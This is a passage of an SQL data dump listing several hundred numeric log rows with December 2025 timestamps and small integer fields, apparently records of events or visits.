(23131, '2025-12-11 08:40:25', 1, 2054, 0, 1, 1),
(23132, '2025-12-11 08:49:40', 1, 2064, 0, 1, 1),
(23133, '2025-12-11 08:51:39', 1, 2060, 0, 1, 1),
(23134, '2025-12-11 10:28:53', 1, 2058, 0, 1, 1),
(23135, '2025-12-11 10:37:43', 1, 2055, 0, 1, 1),
(23136, '2025-12-11 10:48:30', 1, 2054, 0, 1, 1),
(23137, '2025-12-11 11:04:01', 1, 2064, 0, 1, 1),
(23138, '2025-12-11 11:08:32', 1, 2058, 0, 1, 1),
(23139, '2025-12-11 11:45:18', 1, 2054, 0, 1, 1),
(23140, '2025-12-11 12:08:46', 1, 2060, 0, 1, 1),
(23141, '2025-12-11 12:58:37', 1, 2060, 0, 1, 1),
(23142, '2025-12-11 14:04:28', 1, 2064, 0, 1, 1),
(23143, '2025-12-11 14:52:52', 1, 2060, 0, 1, 1),
(23144, '2025-12-11 16:32:58', 1, 2064, 0, 1, 1),
(23145, '2025-12-11 16:49:18', 1, 2064, 0, 1, 1),
(23146, '2025-12-11 16:56:38', 1, 2062, 0, 1, 1),
(23147, '2025-12-11 18:06:12', 1, 2060, 0, 1, 1),
(23148, '2025-12-11 18:38:38', 1, 2064, 0, 1, 1),
(23149, '2025-12-11 19:19:35', 1, 2059, 0, 1, 1),
(23150, '2025-12-11 20:01:04', 1, 2058, 0, 1, 1),
(23151, '2025-12-11 20:04:19', 1, 2061, 0, 1, 1),
(23152, '2025-12-11 20:04:42', 1, 2054, 0, 1, 1),
(23153, '2025-12-11 22:53:33', 1, 2062, 0, 1, 1),
(23154, '2025-12-11 22:53:35', 1, 2061, 0, 1, 1),
(23155, '2025-12-11 22:53:42', 1, 2063, 0, 1, 1),
(23156, '2025-12-11 23:14:00', 1, 2061, 0, 1, 1),
(23157, '2025-12-12 02:22:19', 1, 2054, 0, 1, 1),
(23158, '2025-12-12 02:30:51', 1, 2054, 0, 1, 1),
(23159, '2025-12-12 03:38:02', 1, 2064, 0, 1, 1),
(23160, '2025-12-12 04:04:55', 1, 2054, 0, 1, 1),
(23161, '2025-12-12 05:15:03', 1, 2063, 0, 1, 1),
(23162, '2025-12-12 06:37:12', 1, 2064, 0, 1, 1),
(23163, '2025-12-12 08:28:55', 1, 2059, 0, 1, 1),
(23164, '2025-12-12 08:38:30', 1, 2064, 0, 1, 1),
(23165, '2025-12-12 10:43:31', 1, 2060, 0, 1, 1),
(23166, '2025-12-12 11:37:22', 1, 2064, 0, 1, 1),
(23167, '2025-12-12 11:50:19', 1, 2054, 0, 1, 1),
(23168, '2025-12-12 11:57:59', 1, 2064, 0, 1, 1),
(23169, '2025-12-12 12:12:30', 1, 2060, 0, 1, 1),
(23170, '2025-12-12 15:02:44', 4, 2061, 5288, 1, 1),
(23171, '2025-12-12 15:19:39', 1, 2062, 0, 1, 1),
(23172, '2025-12-12 17:05:58', 1, 2062, 0, 1, 1),
(23173, '2025-12-12 17:07:38', 1, 2064, 0, 1, 1),
(23174, '2025-12-12 17:44:58', 1, 2063, 0, 1, 1),
(23175, '2025-12-12 19:36:35', 1, 2064, 0, 1, 1),
(23176, '2025-12-12 20:54:44', 1, 2064, 0, 1, 1),
(23177, '2025-12-12 21:52:27', 1, 2054, 0, 1, 1),
(23178, '2025-12-12 22:41:58', 1, 2060, 0, 1, 1),
(23179, '2025-12-13 00:30:16', 1, 2060, 0, 1, 1),
(23180, '2025-12-13 00:59:00', 1, 2062, 0, 1, 1),
(23181, '2025-12-13 02:48:14', 1, 2062, 0, 1, 1),
(23182, '2025-12-13 05:01:50', 1, 2064, 0, 1, 1),
(23183, '2025-12-13 05:37:00', 1, 2055, 0, 1, 1),
(23184, '2025-12-13 05:37:47', 1, 2058, 0, 1, 1),
(23185, '2025-12-13 06:24:00', 1, 2054, 0, 1, 1),
(23186, '2025-12-13 07:00:44', 1, 2060, 0, 1, 1),
(23187, '2025-12-13 07:31:00', 1, 2054, 0, 1, 1),
(23188, '2025-12-13 11:00:16', 1, 2058, 0, 1, 1),
(23189, '2025-12-13 11:38:53', 1, 2064, 0, 1, 1),
(23190, '2025-12-13 13:18:22', 1, 2054, 0, 1, 1),
(23191, '2025-12-13 14:51:30', 1, 2062, 0, 1, 1),
(23192, '2025-12-13 14:51:58', 1, 2058, 0, 1, 1),
(23193, '2025-12-13 14:57:42', 1, 2064, 0, 1, 1),
(23194, '2025-12-13 16:47:37', 1, 2058, 0, 1, 1),
(23195, '2025-12-13 16:47:45', 1, 2061, 0, 1, 1),
(23196, '2025-12-13 16:47:55', 1, 2059, 0, 1, 1),
(23197, '2025-12-13 16:48:06', 1, 2060, 0, 1, 1),
(23198, '2025-12-13 16:48:18', 1, 2062, 0, 1, 1),
(23199, '2025-12-13 16:48:28', 1, 2063, 0, 1, 1),
(23200, '2025-12-13 16:48:39', 1, 2064, 0, 1, 1),
(23201, '2025-12-13 16:50:23', 1, 2055, 0, 1, 1),
(23202, '2025-12-13 16:50:25', 1, 2054, 0, 1, 1),
(23203, '2025-12-13 16:50:29', 1, 2053, 0, 1, 1),
(23204, '2025-12-13 16:59:53', 1, 2062, 0, 1, 1),
(23205, '2025-12-13 18:06:31', 1, 2058, 0, 1, 1),
(23206, '2025-12-13 18:06:45', 1, 2061, 0, 1, 1),
(23207, '2025-12-13 18:06:58', 1, 2059, 0, 1, 1),
(23208, '2025-12-13 18:07:17', 1, 2060, 0, 1, 1),
(23209, '2025-12-13 18:07:31', 1, 2062, 0, 1, 1),
(23210, '2025-12-13 18:07:46', 1, 2063, 0, 1, 1),
(23211, '2025-12-13 18:08:02', 1, 2064, 0, 1, 1),
(23212, '2025-12-13 18:11:04', 1, 2055, 0, 1, 1),
(23213, '2025-12-13 18:11:19', 1, 2054, 0, 1, 1),
(23214, '2025-12-13 18:11:35', 1, 2053, 0, 1, 1),
(23215, '2025-12-13 18:35:24', 1, 2053, 0, 1, 1),
(23216, '2025-12-13 18:55:19', 1, 2064, 0, 1, 1),
(23217, '2025-12-13 18:55:40', 1, 2055, 0, 1, 1),
(23218, '2025-12-13 18:56:22', 1, 2063, 0, 1, 1),
(23219, '2025-12-13 18:57:22', 1, 2062, 0, 1, 1),
(23220, '2025-12-13 19:58:16', 1, 2060, 0, 1, 1),
(23221, '2025-12-14 02:16:40', 1, 2064, 0, 1, 1),
(23222, '2025-12-14 03:26:45', 1, 2060, 0, 1, 1),
(23223, '2025-12-14 04:11:33', 1, 2054, 0, 1, 1),
(23224, '2025-12-14 05:03:36', 1, 2064, 0, 1, 1),
(23225, '2025-12-14 05:44:23', 1, 2053, 0, 1, 1),
(23226, '2025-12-14 06:17:59', 1, 2061, 0, 1, 1),
(23227, '2025-12-14 06:41:24', 1, 2059, 0, 1, 1),
(23228, '2025-12-14 06:43:30', 1, 2062, 0, 1, 1),
(23229, '2025-12-14 06:45:18', 1, 2061, 0, 1, 1),
(23230, '2025-12-14 06:46:09', 1, 2058, 0, 1, 1),
(23231, '2025-12-14 06:46:59', 1, 2063, 0, 1, 1),
(23232, '2025-12-14 07:06:26', 1, 2062, 0, 1, 1),
(23233, '2025-12-14 07:17:28', 1, 2060, 0, 1, 1),
(23234, '2025-12-14 07:17:36', 1, 2059, 0, 1, 1),
(23235, '2025-12-14 10:58:39', 1, 2054, 0, 1, 1),
(23236, '2025-12-14 11:52:36', 1, 2055, 0, 1, 1),
(23237, '2025-12-14 11:56:14', 1, 2064, 0, 1, 1),
(23238, '2025-12-14 12:02:05', 1, 2055, 0, 1, 1),
(23239, '2025-12-14 12:02:10', 1, 2062, 0, 1, 1),
(23240, '2025-12-14 12:02:12', 1, 2061, 0, 1, 1),
(23241, '2025-12-14 12:02:13', 1, 2059, 0, 1, 1),
(23242, '2025-12-14 12:02:14', 1, 2058, 0, 1, 1),
(23243, '2025-12-14 12:02:15', 1, 2064, 0, 1, 1),
(23244, '2025-12-14 12:02:16', 1, 2063, 0, 1, 1),
(23245, '2025-12-14 12:02:17', 1, 2060, 0, 1, 1),
(23246, '2025-12-14 12:02:21', 1, 2053, 0, 1, 1),
(23247, '2025-12-14 12:07:12', 1, 2064, 0, 1, 1),
(23248, '2025-12-14 13:43:50', 1, 2061, 0, 1, 1),
(23249, '2025-12-14 15:51:42', 1, 2062, 0, 1, 1),
(23250, '2025-12-14 17:13:07', 1, 2061, 0, 1, 1),
(23251, '2025-12-14 17:58:34', 1, 2054, 0, 1, 1),
(23252, '2025-12-14 19:14:04', 1, 2064, 0, 1, 1),
(23253, '2025-12-14 19:29:23', 1, 2060, 0, 1, 1),
(23254, '2025-12-14 23:44:25', 1, 2060, 0, 1, 1),
(23255, '2025-12-14 23:46:38', 1, 2061, 0, 1, 1),
(23256, '2025-12-14 23:47:18', 1, 2055, 0, 1, 1),
(23257, '2025-12-14 23:47:38', 1, 2054, 0, 1, 1),
(23258, '2025-12-14 23:50:28', 1, 2053, 0, 1, 1),
(23259, '2025-12-14 23:51:25', 1, 2059, 0, 1, 1),
(23260, '2025-12-14 23:54:34', 1, 2058, 0, 1, 1),
(23261, '2025-12-15 00:15:00', 1, 2063, 0, 1, 1),
(23262, '2025-12-15 00:30:16', 1, 2060, 0, 1, 1),
(23263, '2025-12-15 01:31:03', 1, 2062, 0, 1, 1),
(23264, '2025-12-15 01:44:43', 1, 2064, 0, 1, 1),
(23265, '2025-12-15 07:01:18', 1, 2054, 0, 1, 1),
(23266, '2025-12-15 07:45:33', 1, 2062, 0, 1, 1),
(23267, '2025-12-15 08:45:43', 1, 2064, 0, 1, 1),
(23268, '2025-12-15 08:45:49', 1, 2060, 0, 1, 1),
(23269, '2025-12-15 08:45:51', 1, 2063, 0, 1, 1),
(23270, '2025-12-15 08:45:52', 1, 2058, 0, 1, 1),
(23271, '2025-12-15 08:45:53', 1, 2058, 0, 1, 1),
(23272, '2025-12-15 08:45:55', 1, 2061, 0, 1, 1),
(23273, '2025-12-15 08:45:56', 1, 2059, 0, 1, 1),
(23274, '2025-12-15 08:46:01', 1, 2062, 0, 1, 1),
(23275, '2025-12-15 08:46:02', 1, 2054, 0, 1, 1),
(23276, '2025-12-15 08:46:04', 1, 2054, 0, 1, 1),
(23277, '2025-12-15 08:46:10', 1, 2055, 0, 1, 1),
(23278, '2025-12-15 08:46:18', 1, 2064, 0, 1, 1),
(23279, '2025-12-15 08:46:21', 1, 2055, 0, 1, 1),
(23280, '2025-12-15 08:46:25', 1, 2053, 0, 1, 1),
(23281, '2025-12-15 08:46:29', 1, 2060, 0, 1, 1),
(23282, '2025-12-15 09:07:44', 1, 2064, 0, 1, 1),
(23283, '2025-12-15 09:20:38', 1, 2062, 0, 1, 1),
(23284, '2025-12-15 10:36:04', 1, 2060, 0, 1, 1),
(23285, '2025-12-15 11:16:03', 1, 2061, 0, 1, 1),
(23286, '2025-12-15 12:06:37', 1, 2064, 0, 1, 1),
(23287, '2025-12-15 12:48:59', 1, 2060, 0, 1, 1),
(23288, '2025-12-15 12:49:02', 1, 2060, 0, 1, 1),
(23289, '2025-12-15 13:26:29', 1, 2060, 0, 1, 1),
(23290, '2025-12-15 16:44:35', 1, 2062, 0, 1, 1),
(23291, '2025-12-15 16:55:51', 1, 2054, 0, 1, 1),
(23292, '2025-12-15 17:13:28', 1, 2064, 0, 1, 1),
(23293, '2025-12-15 17:38:29', 1, 2062, 0, 1, 1),
(23294, '2025-12-15 18:03:03', 1, 2064, 0, 1, 1),
(23295, '2025-12-15 18:38:00', 1, 2064, 0, 1, 1),
(23296, '2025-12-15 19:44:11', 1, 2060, 0, 1, 1),
(23297, '2025-12-15 19:46:56', 1, 2054, 0, 1, 1),
(23298, '2025-12-15 19:47:03', 1, 2058, 0, 1, 1),
(23299, '2025-12-15 21:18:35', 1, 2060, 0, 1, 1),
(23300, '2025-12-15 21:20:58', 1, 2058, 0, 1, 1),
(23301, '2025-12-15 22:16:43', 1, 2060, 0, 1, 1),
(23302, '2025-12-15 22:42:49', 1, 2055, 0, 1, 1),
(23303, '2025-12-15 23:58:25', 1, 2054, 0, 1, 1),
(23304, '2025-12-16 01:50:19', 1, 2054, 0, 1, 1),
(23305, '2025-12-16 01:53:58', 1, 2053, 0, 1, 1),
(23306, '2025-12-16 04:27:30', 1, 2064, 0, 1, 1),
(23307, '2025-12-16 07:24:05', 1, 2062, 0, 1, 1),
(23308, '2025-12-16 07:25:19', 1, 2064, 0, 1, 1),
(23309, '2025-12-16 08:08:32', 1, 2064, 0, 1, 1),
(23310, '2025-12-16 10:25:32', 1, 2060, 0, 1, 1),
(23311, '2025-12-16 12:04:12', 1, 2054, 0, 1, 1),
(23312, '2025-12-16 12:10:01', 1, 2060, 0, 1, 1),
(23313, '2025-12-16 13:41:54', 1, 2060, 0, 1, 1),
(23314, '2025-12-16 15:07:25', 1, 2053, 0, 1, 1),
(23315, '2025-12-16 15:08:10', 1, 2064, 0, 1, 1),
(23316, '2025-12-16 15:09:11', 1, 2055, 0, 1, 1),
(23317, '2025-12-16 15:12:10', 1, 2063, 0, 1, 1),
(23318, '2025-12-16 15:13:48', 1, 2062, 0, 1, 1),
(23319, '2025-12-16 15:33:42', 1, 2062, 0, 1, 1),
(23320, '2025-12-16 15:38:33', 1, 2064, 0, 1, 1),
(23321, '2025-12-16 15:57:39', 1, 2062, 0, 1, 1),
(23322, '2025-12-16 16:08:49', 1, 2058, 0, 1, 1),
(23323, '2025-12-16 19:58:28', 1, 2059, 0, 1, 1),
(23324, '2025-12-16 20:08:01', 1, 2060, 0, 1, 1),
(23325, '2025-12-16 22:19:15', 1, 2064, 0, 1, 1),
(23326, '2025-12-17 01:03:30', 1, 2053, 0, 1, 1),
(23327, '2025-12-17 01:27:22', 1, 2063, 0, 1, 1),
(23328, '2025-12-17 02:12:37', 1, 2064, 0, 1, 1),
(23329, '2025-12-17 02:39:36', 1, 2054, 0, 1, 1),
(23330, '2025-12-17 02:40:06', 1, 2054, 0, 1, 1),
(23331, '2025-12-17 02:49:12', 1, 2059, 0, 1, 1),
(23332, '2025-12-17 02:50:25', 1, 2062, 0, 1, 1),
(23333, '2025-12-17 02:50:27', 1, 2061, 0, 1, 1),
(23334, '2025-12-17 02:50:30', 1, 2058, 0, 1, 1),
(23335, '2025-12-17 02:51:28', 1, 2063, 0, 1, 1),
(23336, '2025-12-17 03:37:44', 1, 2060, 0, 1, 1),
(23337, '2025-12-17 05:38:04', 1, 2058, 0, 1, 1),
(23338, '2025-12-17 06:24:25', 1, 2064, 0, 1, 1),
(23339, '2025-12-17 06:35:20', 1, 2064, 0, 1, 1),
(23340, '2025-12-17 07:10:56', 1, 2060, 0, 1, 1),
(23341, '2025-12-17 07:23:38', 1, 2058, 0, 1, 1),
(23342, '2025-12-17 07:36:39', 1, 2063, 0, 1, 1),
(23343, '2025-12-17 08:18:05', 1, 2064, 0, 1, 1),
(23344, '2025-12-17 08:18:08', 4, 2064, 5401, 1, 1),
(23345, '2025-12-17 08:18:11', 1, 2064, 0, 1, 1),
(23346, '2025-12-17 08:18:11', 1, 2064, 0, 1, 1),
(23347, '2025-12-17 08:18:18', 1, 2064, 5401, 1, 1),
(23348, '2025-12-17 09:31:14', 1, 2054, 0, 1, 1),
(23349, '2025-12-17 10:17:12', 1, 2053, 0, 1, 1),
(23350, '2025-12-17 11:55:34', 1, 2063, 0, 1, 1),
(23351, '2025-12-17 12:26:33', 1, 2063, 0, 1, 1),
(23352, '2025-12-17 14:02:55', 1, 2060, 0, 1, 1),
(23353, '2025-12-17 14:02:58', 1, 2060, 0, 1, 1),
(23354, '2025-12-17 15:32:27', 1, 2062, 0, 1, 1),
(23355, '2025-12-17 15:41:02', 1, 2064, 0, 1, 1),
(23356, '2025-12-17 15:54:40', 1, 2055, 0, 1, 1),
(23357, '2025-12-17 16:25:55', 1, 2062, 0, 1, 1),
(23358, '2025-12-17 16:36:32', 1, 2064, 0, 1, 1),
(23359, '2025-12-17 17:26:16', 1, 2054, 0, 1, 1),
(23360, '2025-12-17 17:38:03', 1, 2060, 0, 1, 1),
(23361, '2025-12-17 17:59:22', 1, 2059, 0, 1, 1),
(23362, '2025-12-17 18:28:18', 1, 2061, 0, 1, 1),
(23363, '2025-12-17 20:42:57', 1, 2064, 0, 1, 1),
(23364, '2025-12-17 21:06:26', 1, 2064, 0, 1, 1),
(23365, '2025-12-17 22:00:30', 1, 2061, 0, 1, 1),
(23366, '2025-12-17 22:09:57', 1, 2058, 0, 1, 1),
(23367, '2025-12-17 22:51:03', 1, 2060, 0, 1, 1),
(23368, '2025-12-17 22:52:24', 1, 2060, 0, 1, 1),
(23369, '2025-12-17 23:14:59', 1, 2060, 0, 1, 1),
(23370, '2025-12-18 00:44:58', 1, 2062, 0, 1, 1),
(23371, '2025-12-18 01:08:09', 1, 2054, 0, 1, 1),
(23372, '2025-12-18 05:25:24', 1, 2060, 0, 1, 1),
(23373, '2025-12-18 05:59:05', 1, 2059, 0, 1, 1),
(23374, '2025-12-18 06:19:42', 1, 2062, 0, 1, 1),
(23375, '2025-12-18 06:29:59', 1, 2055, 0, 1, 1),
(23376, '2025-12-18 07:36:33', 1, 2064, 0, 1, 1),
(23377, '2025-12-18 07:49:38', 1, 2054, 0, 1, 1),
(23378, '2025-12-18 08:30:23', 1, 2054, 0, 1, 1),
(23379, '2025-12-18 08:31:38', 1, 2058, 0, 1, 1),
(23380, '2025-12-18 10:54:05', 1, 2054, 0, 1, 1),
(23381, '2025-12-18 11:50:03', 1, 2064, 0, 1, 1),
(23382, '2025-12-18 12:19:03', 1, 2060, 0, 1, 1),
(23383, '2025-12-18 14:22:09', 1, 2058, 0, 1, 1),
(23384, '2025-12-18 14:30:05', 1, 2060, 0, 1, 1),
(23385, '2025-12-18 14:34:37', 1, 2060, 0, 1, 1),
(23386, '2025-12-18 14:43:31', 1, 2060, 0, 1, 1),
(23387, '2025-12-18 16:01:16', 1, 2064, 0, 1, 1),
(23388, '2025-12-18 17:03:33', 1, 2061, 0, 1, 1),
(23389, '2025-12-18 17:08:00', 1, 2062, 0, 1, 1),
(23390, '2025-12-18 17:17:46', 1, 2060, 0, 1, 1),
(23391, '2025-12-18 18:33:46', 1, 2062, 0, 1, 1),
(23392, '2025-12-18 18:35:07', 1, 2064, 0, 1, 1),
(23393, '2025-12-18 18:44:56', 1, 2053, 0, 1, 1),
(23394, '2025-12-18 18:51:24', 1, 2061, 0, 1, 1),
(23395, '2025-12-18 19:09:49', 1, 2058, 0, 1, 1),
(23396, '2025-12-18 19:42:57', 1, 2064, 0, 1, 1),
(23397, '2025-12-18 19:57:33', 1, 2054, 0, 1, 1),
(23398, '2025-12-18 21:38:06', 1, 2064, 0, 1, 1),
(23399, '2025-12-18 21:51:26', 1, 2060, 0, 1, 1),
(23400, '2025-12-18 21:57:49', 1, 2062, 0, 1, 1),
(23401, '2025-12-18 22:03:10', 1, 2063, 0, 1, 1),
(23402, '2025-12-18 22:27:41', 1, 2054, 0, 1, 1),
(23403, '2025-12-18 22:39:46', 1, 2061, 0, 1, 1),
(23404, '2025-12-18 22:39:50', 1, 2062, 0, 1, 1),
(23405, '2025-12-18 22:39:54', 1, 2063, 0, 1, 1),
(23406, '2025-12-18 23:13:13', 1, 2062, 0, 1, 1),
(23407, '2025-12-18 23:22:08', 1, 2061, 0, 1, 1),
(23408, '2025-12-18 23:42:48', 1, 2058, 0, 1, 1),
(23409, '2025-12-18 23:57:37', 1, 2059, 0, 1, 1),
(23410, '2025-12-19 02:03:53', 1, 2064, 0, 1, 1),
(23411, '2025-12-19 02:05:33', 1, 2054, 0, 1, 1),
(23412, '2025-12-19 03:41:05', 1, 2060, 0, 1, 1),
(23413, '2025-12-19 04:24:05', 1, 2054, 0, 1, 1),
(23414, '2025-12-19 05:15:18', 1, 2055, 0, 1, 1),
(23415, '2025-12-19 05:21:42', 1, 2064, 0, 1, 1),
(23416, '2025-12-19 05:29:57', 1, 2058, 0, 1, 1),
(23417, '2025-12-19 06:39:10', 1, 2054, 0, 1, 1),
(23418, '2025-12-19 06:58:57', 1, 2061, 0, 1, 1),
(23419, '2025-12-19 07:02:49', 1, 2053, 0, 1, 1),
(23420, '2025-12-19 07:05:22', 1, 2064, 0, 1, 1),
(23421, '2025-12-19 07:05:24', 1, 2055, 0, 1, 1),
(23422, '2025-12-19 07:16:18', 1, 2063, 0, 1, 1),
(23423, '2025-12-19 07:16:27', 1, 2062, 0, 1, 1),
(23424, '2025-12-19 11:08:06', 1, 2060, 0, 1, 1),
(23425, '2025-12-19 12:20:16', 1, 2064, 0, 1, 1),
(23426, '2025-12-19 12:20:42', 1, 2064, 0, 1, 1),
(23427, '2025-12-19 13:03:56', 1, 2062, 0, 1, 1),
(23428, '2025-12-19 15:24:35', 1, 2062, 0, 1, 1),
(23429, '2025-12-19 15:44:26', 1, 2064, 0, 1, 1),
(23430, '2025-12-19 15:45:13', 1, 2054, 0, 1, 1),
(23431, '2025-12-19 16:00:38', 1, 2061, 0, 1, 1),
(23432, '2025-12-19 17:02:15', 1, 2060, 0, 1, 1),
(23433, '2025-12-19 17:03:34', 1, 2061, 0, 1, 1),
(23434, '2025-12-19 17:15:04', 1, 2054, 0, 1, 1),
(23435, '2025-12-19 18:33:33', 1, 2053, 0, 1, 1),
(23436, '2025-12-19 19:24:33', 1, 2060, 0, 1, 1),
(23437, '2025-12-19 19:26:02', 1, 2055, 0, 1, 1),
(23438, '2025-12-19 20:59:19', 1, 2062, 0, 1, 1),
(23439, '2025-12-19 21:01:48', 1, 2061, 0, 1, 1),
(23440, '2025-12-19 21:02:08', 1, 2058, 0, 1, 1),
(23441, '2025-12-19 21:02:48', 1, 2059, 0, 1, 1),
(23442, '2025-12-19 21:03:16', 1, 2063, 0, 1, 1),
(23443, '2025-12-19 21:41:58', 1, 2054, 0, 1, 1),
(23444, '2025-12-19 22:40:24', 1, 2064, 0, 1, 1),
(23445, '2025-12-19 23:20:56', 1, 2064, 0, 1, 1),
(23446, '2025-12-20 00:15:02', 1, 2064, 0, 1, 1),
(23447, '2025-12-20 00:15:02', 1, 2064, 0, 1, 1),
(23448, '2025-12-20 00:15:02', 1, 2064, 0, 1, 1),
(23449, '2025-12-20 00:15:02', 1, 2063, 0, 1, 1),
(23450, '2025-12-20 00:15:02', 1, 2062, 0, 1, 1),
(23451, '2025-12-20 00:15:02', 1, 2061, 0, 1, 1),
(23452, '2025-12-20 00:15:02', 1, 2060, 0, 1, 1),
(23453, '2025-12-20 00:15:02', 1, 2059, 0, 1, 1),
(23454, '2025-12-20 00:15:05', 1, 2062, 0, 1, 1),
(23455, '2025-12-20 00:15:06', 1, 2064, 0, 1, 1),
(23456, '2025-12-20 00:15:06', 1, 2063, 0, 1, 1),
(23457, '2025-12-20 00:15:07', 1, 2064, 0, 1, 1),
(23458, '2025-12-20 00:15:07', 1, 2062, 0, 1, 1),
(23459, '2025-12-20 00:15:08', 1, 2064, 0, 1, 1),
(23460, '2025-12-20 00:15:08', 1, 2061, 0, 1, 1),
(23461, '2025-12-20 00:15:08', 1, 2059, 0, 1, 1),
(23462, '2025-12-20 00:15:08', 1, 2060, 0, 1, 1),
(23463, '2025-12-20 00:15:08', 1, 2064, 0, 1, 1),
(23464, '2025-12-20 00:15:09', 1, 2063, 0, 1, 1),
(23465, '2025-12-20 00:15:10', 1, 2064, 0, 1, 1),
(23466, '2025-12-20 00:15:10', 1, 2064, 0, 1, 1),
(23467, '2025-12-20 00:15:10', 1, 2063, 0, 1, 1),
(23468, '2025-12-20 00:15:11', 1, 2061, 0, 1, 1),
(23469, '2025-12-20 00:15:11', 1, 2062, 0, 1, 1),
(23470, '2025-12-20 00:15:13', 1, 2063, 0, 1, 1),
(23471, '2025-12-20 00:15:13', 1, 2055, 0, 1, 1),
(23472, '2025-12-20 00:15:13', 1, 2064, 0, 1, 1),
(23473, '2025-12-20 00:15:13', 1, 2064, 0, 1, 1),
(23474, '2025-12-20 00:15:13', 1, 2059, 0, 1, 1),
(23475, '2025-12-20 00:15:14', 1, 2054, 0, 1, 1),
(23476, '2025-12-20 00:15:14', 1, 2064, 0, 1, 1),
(23477, '2025-12-20 00:15:15', 1, 2060, 0, 1, 1),
(23478, '2025-12-20 00:15:15', 1, 2064, 0, 1, 1),
(23479, '2025-12-20 00:15:15', 1, 2064, 0, 1, 1),
(23480, '2025-12-20 00:15:15', 1, 2063, 0, 1, 1),
(23481, '2025-12-20 00:15:16', 1, 2062, 0, 1, 1),
(23482, '2025-12-20 00:15:16', 1, 2061, 0, 1, 1),
(23483, '2025-12-20 00:15:16', 1, 2064, 0, 1, 1),
(23484, '2025-12-20 00:15:18', 1, 2055, 0, 1, 1),
(23485, '2025-12-20 00:15:18', 1, 2063, 0, 1, 1),
(23486, '2025-12-20 00:15:19', 1, 2058, 0, 1, 1),
(23487, '2025-12-20 00:15:21', 1, 2064, 0, 1, 1),
(23488, '2025-12-20 00:15:21', 1, 2054, 0, 1, 1),
(23489, '2025-12-20 00:15:21', 1, 2064, 0, 1, 1),
(23490, '2025-12-20 00:15:21', 1, 2062, 0, 1, 1),
(23491, '2025-12-20 00:15:21', 1, 2063, 0, 1, 1),
(23492, '2025-12-20 00:15:21', 1, 2061, 0, 1, 1),
(23493, '2025-12-20 00:15:22', 1, 2064, 0, 1, 1),
(23494, '2025-12-20 00:15:24', 1, 2060, 0, 1, 1),
(23495, '2025-12-20 00:15:24', 1, 2055, 0, 1, 1),
(23496, '2025-12-20 00:15:26', 1, 2058, 0, 1, 1),
(23497, '2025-12-20 00:15:26', 1, 2059, 0, 1, 1),
(23498, '2025-12-20 00:15:26', 1, 2058, 0, 1, 1),
(23499, '2025-12-20 00:15:26', 1, 2054, 0, 1, 1),
(23500, '2025-12-20 00:15:26', 1, 2054, 0, 1, 1),
(23501, '2025-12-20 00:15:26', 1, 2053, 0, 1, 1),
(23502, '2025-12-20 00:15:27', 1, 2053, 0, 1, 1),
(23503, '2025-12-20 00:15:27', 1, 2053, 0, 1, 1),
(23504, '2025-12-20 00:15:28', 1, 2055, 0, 1, 1),
(23505, '2025-12-20 00:15:28', 1, 2055, 0, 1, 1),
(23506, '2025-12-20 00:15:28', 1, 2059, 0, 1, 1),
(23507, '2025-12-20 00:15:28', 1, 2053, 0, 1, 1),
(23508, '2025-12-20 00:15:28', 1, 2060, 0, 1, 1),
(23509, '2025-12-20 00:15:28', 1, 2058, 0, 1, 1),
(23510, '2025-12-20 00:15:29', 1, 2054, 0, 1, 1),
(23511, '2025-12-20 00:15:29', 1, 2053, 0, 1, 1),
(23512, '2025-12-20 00:15:29', 1, 2053, 0, 1, 1),
(23513, '2025-12-20 00:15:29', 1, 2058, 0, 1, 1),
(23514, '2025-12-20 00:15:33', 1, 2055, 0, 1, 1),
(23515, '2025-12-20 00:15:33', 1, 2053, 0, 1, 1),
(23516, '2025-12-20 00:15:33', 1, 2059, 0, 1, 1),
(23517, '2025-12-20 00:15:33', 1, 2053, 0, 1, 1),
(23518, '2025-12-20 00:15:34', 1, 2058, 0, 1, 1),
(23519, '2025-12-20 00:15:34', 1, 2060, 0, 1, 1),
(23520, '2025-12-20 00:15:34', 1, 2053, 0, 1, 1),
(23521, '2025-12-20 00:15:34', 1, 2054, 0, 1, 1),
(23522, '2025-12-20 00:15:35', 1, 2058, 0, 1, 1),
(23523, '2025-12-20 00:15:36', 1, 2053, 0, 1, 1),
(23524, '2025-12-20 00:15:36', 1, 2053, 0, 1, 1),
(23525, '2025-12-20 00:15:36', 1, 2053, 0, 1, 1),
(23526, '2025-12-20 00:15:36', 1, 2059, 0, 1, 1),
(23527, '2025-12-20 00:15:37', 1, 2059, 0, 1, 1),
(23528, '2025-12-20 00:15:37', 1, 2059, 0, 1, 1),
(23529, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23530, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23531, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23532, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23533, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23534, '2025-12-20 00:15:38', 1, 2058, 0, 1, 1),
(23535, '2025-12-20 00:15:39', 1, 2054, 0, 1, 1),
(23536, '2025-12-20 00:15:39', 1, 2054, 0, 1, 1),
(23537, '2025-12-20 00:15:40', 1, 2054, 0, 1, 1),
(23538, '2025-12-20 00:15:41', 1, 2055, 0, 1, 1),
(23539, '2025-12-20 00:15:41', 1, 2055, 0, 1, 1),
(23540, '2025-12-20 00:15:41', 1, 2055, 0, 1, 1),
(23541, '2025-12-20 00:15:41', 1, 2055, 0, 1, 1),
(23542, '2025-12-20 00:15:41', 1, 2055, 0, 1, 1),
(23543, '2025-12-20 00:15:42', 1, 2055, 0, 1, 1),
(23544, '2025-12-20 00:15:42', 1, 2055, 0, 1, 1),
(23545, '2025-12-20 00:15:42', 1, 2053, 0, 1, 1),
(23546, '2025-12-20 00:15:42', 1, 2053, 0, 1, 1),
(23547, '2025-12-20 00:15:42', 1, 2059, 0, 1, 1),
(23548, '2025-12-20 00:15:42', 1, 2059, 0, 1, 1),
(23549, '2025-12-20 00:15:43', 1, 2059, 0, 1, 1),
(23550, '2025-12-20 00:15:43', 1, 2059, 0, 1, 1),
(23551, '2025-12-20 00:15:43', 1, 2053, 0, 1, 1),
(23552, '2025-12-20 00:15:43', 1, 2053, 0, 1, 1),
(23553, '2025-12-20 00:15:44', 1, 2059, 0, 1, 1),
(23554, '2025-12-20 00:15:45', 1, 2054, 0, 1, 1),
(23555, '2025-12-20 00:15:45', 1, 2054, 0, 1, 1),
(23556, '2025-12-20 00:15:45', 1, 2058, 0, 1, 1),
(23557, '2025-12-20 00:15:45', 1, 2054, 0, 1, 1),
(23558, '2025-12-20 00:15:45', 1, 2058, 0, 1, 1),
